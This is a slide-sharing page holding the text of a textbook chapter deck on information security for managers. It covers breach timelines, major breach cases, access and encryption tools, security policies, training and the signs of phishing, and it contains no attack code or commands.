LA HUG - Video Testimonials with Chynna Morgan - June 2024LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024
 
The key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EUThe key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EU
 
Premium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern BusinessesPremium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern Businesses
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
 
Brand Analysis for an artist named Struan
Brand Analysis for an artist named StruanBrand Analysis for an artist named Struan
Brand Analysis for an artist named Struan
 
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdfSearch Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
 

ch07-Security.pptx

  • 1. Managing and Using Information Systems: A Strategic Approach – Sixth Edition Keri Pearlson, Carol Saunders, and Dennis Galletta © Copyright 2016 John Wiley & Sons, Inc.
  • 3. Opening Case • What are some important lessons from the opening case? • How long did the theft take? How did the theft likely occur? • How long did it take Office of Personnel Management (OPM) to detect the theft? • How damaging are the early reports of the data theft for the OPM? © 2016 John Wiley & Sons, Inc. 3
  • 4. How Long Does it Take? • How long do you think it usually takes for someone to discover a security compromise in a system after the evidence shows up? A. Several seconds B. Several minutes C. Several hours D. Several days E. Several months A Mandiant study revealed that the median for 2014 was 205 days! That’s almost 7 months! The record is 2,982 which is 11 years! © 2016 John Wiley & Sons, Inc. 4
  • 5. Timeline of a Breach - Fantasy • Hollywood has a fairly consistent script: • 0: Crooks get password and locate the file • Minute 1: Crooks start downloading data and destroying the original • Minute 2: Officials sense the breach • Minute 3: Officials try to block the breach • Minute 4: Crooks’ download completes • Minute 5: Officials lose all data Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 5
  • 6. Timeline of a Breach - Reality Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 6
  • 7. IT Security Decision Framework Decision Who is Responsible Why? Otherwise? Information Security Strategy Business Leaders They know business strategies Security is an afterthought and patched on Information Security Infrastructure IT Leaders Technical knowledge is needed Incorrect infrastructure decisions Information Security Policy Shared: IT and Business Leaders Trade-offs need to be handled correctly Unenforceable policies that don’t fit the IT and the users SETA (training) Shared: IT and Business Leaders Business buy-in and technical correctness Insufficient training; errors Information Security Investments Shared: IT and Business Leaders Evaluation of business goals and technical requirements Over- or under- investment in security © 2016 John Wiley & Sons, Inc. 7
  • 8. How Have Big Breaches Occurred? Date Detected Company What was stolen How November 2013 Target 40 million credit & debit cards Contractor opened virus-laden email attachment May 2014 Ebay #1 145 million user names, physical addresses, phones, birthdays, encrypted passwords Employee’s password obtained September 2014 Ebay #2 Small but unknown Cross-site scripting September 2014 Home Depot 56 million credit card numbers 53 million email addresses Obtaining a vendor’s password/exploiting OS vulnerability January 2015 Anthem Blue Cross 80 million names, birthdays, emails, Social security numbers, addresses, and employment data Obtaining passwords from 5 or more high-level employees © 2016 John Wiley & Sons, Inc. 8
  • 9. Password Breaches • 80% of breaches are caused by stealing a password. • You can steal a password by: • Phishing attack • Key logger (hardware or software) • Guessing weak passwords (123456 is most common) • Evil twin wifi © 2016 John Wiley & Sons, Inc. 9
  • 10. Insecurity of WiFi– a Dutch study • “We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.” • Had WiFi transmitter broadcasting “Starbucks” as ID • Because they were connected to him, he scanned for unpatched or vulnerable mobile devices or laptops • He also saw passwords and could lock them out of their own accounts. • The correspondent: “I will never again be connecting to an insecure public WiFi network without taking security measures.” © 2016 John Wiley & Sons, Inc. Slide 5-10
  • 11. Other Approaches • Cross-site scripting (malicious code pointing to a link requiring log-in at an imposter site) • Third parties • Target’s HVAC system was connected to main systems • Contractors had access • Hackers gained contractors’ password • Malware captured customer credit card info before it could be encrypted © 2016 John Wiley & Sons, Inc. 11
  • 12. Cost of Breaches • Estimated at $145 to $154 per stolen record • Revenue lost when sales decline • Some costs can be recouped by insurance © 2016 John Wiley & Sons, Inc. 12
  • 13. Can You be Safe? • No, unless the information is permanently inaccessible • “You cannot make a computer secure” – from Dain Gary, former CERT chief • 97% of all firms have been breached • Sometimes security makes systems less usable © 2016 John Wiley & Sons, Inc. 13
  • 14. What Motivates the Hackers? • Sell stolen credit card numbers for up to $50 each • 2 million Target card numbers were sold for $20 each on average • Street gang members can usually get $400 out of a card • Some “kits” (card number plus SSN plus medical information) sell for up to $1,000 • They allow opening new account cards • Stolen cards can be sold for bitcoin on the Deep Web © 2016 John Wiley & Sons, Inc. 14
  • 15. What Should Management Do? • Security strategy • Infrastructure • Access tools * • Storage and transmission tools * • Security policies * • Training * • Investments * Described next © 2016 John Wiley & Sons, Inc. 15
  • 16. Access Tools Access Tool Ubiquity Advantages Disadvantages Physical locks Very high • Excellent if guarded • Locks can be picked • Physical Access is often not needed • Keys can be lost Passwords Very high • User acceptance and familiarity • Ease of use • Mature practices • Poor by themselves • Sometimes forgotten • Sometimes stolen from users using deception or key loggers Biometrics Medium • Can be reliable • Never forgotten • Cannot be stolen • Can be inexpensive • False positives/negatives • Some are expensive • Some might change (e.g., voice) • Lost limbs • Loopholes (e.g., photo) © 2016 John Wiley & Sons, Inc. 16
  • 17. Access Tools (continued) Access Tool Ubiquity Advantages Disadvantages Challenge questions Medium (high in banking) • Not forgotten • Multitude of questions can be used • Social networking might reveal some answers • Personal knowledge of an individual might reveal the answers • Spelling might not be consistent Token Low • Stolen passkey is useless quickly • Requires carrying a device Text message Medium • Stolen passkey is useless • Mobile phone already owned by users • Useful as a secondary mechanism too • Requires mobile phone ownership by all users • Home phone option requires speech synthesis • Requires alternative access control if mobile phone lost Multi-factor authentication Medium • Stolen password is useless • Enhanced security • Requires an additional technique if one of the two fails • Temptation for easy password © 2016 John Wiley & Sons, Inc. 17
  • 18. Storage and Transmission Tools Tool Ubiquity Advantages Disadvantages Antivirus/ antispyware Very high • Blocks many known threats • Blocks some “zero-day” threats • Slow down operating system • “Zero day” threats can be missed Firewall High • Can prevent some targeted traffic • Can only filter known threats • Can have well-known “holes” System logs Very high • Can reveal IP address of attacker • Can estimate the extent of the breach • Hackers can conceal their IP address • Hackers can delete logs • Logs can be huge • Irregular inspections System alerts High • Can help point to logs • Can detect an attack in process • High sensitivity • Low selectivity © 2016 John Wiley & Sons, Inc. 18
  • 19. Storage and Transmission Tools (continued) Tool Ubiquity Advantages Disadvantages Encryption Very high • Difficult to access a file without the key • Long keys could take years to break • Keys are unnecessary if password is known • If the key is not strong, hackers could uncover it by trial and error WEP/WPA Very high • Same as encryption • Most devices have the capability • Provides secure wifi connection • Same as encryption • Some older devices have limited protections • WEP is not secure, yet it is still provided VPN Medium • Trusted connection is as if you were connected on site • Hard to decrypt • Device could be stolen while connected • Sometimes slows the connection © 2016 John Wiley & Sons, Inc. 19
  • 20. Security Policies • Perform security updates promptly • Separate unrelated networks • Keep passwords secret • Manage mobile devices (BYOD) • Formulate data policies (retention and disposal) • Manage social media (rules as to what can be shared, how to identify yourself) • Use consultants (Managed Security Services Providers) © 2016 John Wiley & Sons, Inc. 20
  • 21. SETA (Security Education, Training, and Awareness) • Training on access tools • Limitations of passwords • Formulating a password • Changing passwords periodically • Using multi-factor authentication • Using password managers © 2016 John Wiley & Sons, Inc. 21
  • 22. SETA (Security Education, Training, and Awareness) • BYOD • Rules • How to follow them • Social Media • Rules • How to follow them • Cases from the past that created problems © 2016 John Wiley & Sons, Inc. 22
  • 23. SETA (Security Education, Training, and Awareness) • Vigilance: Recognizing: • Bogus warning messages • Phishing emails • Physical intrusions • Ports and access channels to examine © 2016 John Wiley & Sons, Inc. 23
  • 24. Classic Signs of Phishing • Account is being closed • Email in-box is full • Winning a contest or lottery • Inheritance or commission to handle funds • Product delivery failed • Odd URL when hovering • Familiar name but strange email address • Poor grammar/spelling • Impossibly low prices • Attachment with EXE, ZIP, or BAT (etc.) © 2016 John Wiley & Sons, Inc. 24
  • 25. Managing and Using Information Systems: A Strategic Approach – Sixth Edition Keri Pearlson, Carol Saunders, and Dennis Galletta © Copyright 2016 John Wiley & Sons, Inc.

Editor's Notes

  1. The hackers did not carry out a dramatic and quick theft; they had a year to steal the records at their leisure. The theft took place over a year, and the hackers stole a password. It took many months for OPM to detect the theft. Early reports say that at least 4 million, and as many as 14 million records were stolen. Each record contained 127-page security clearances that include sensitive medical, personal, and relationship information.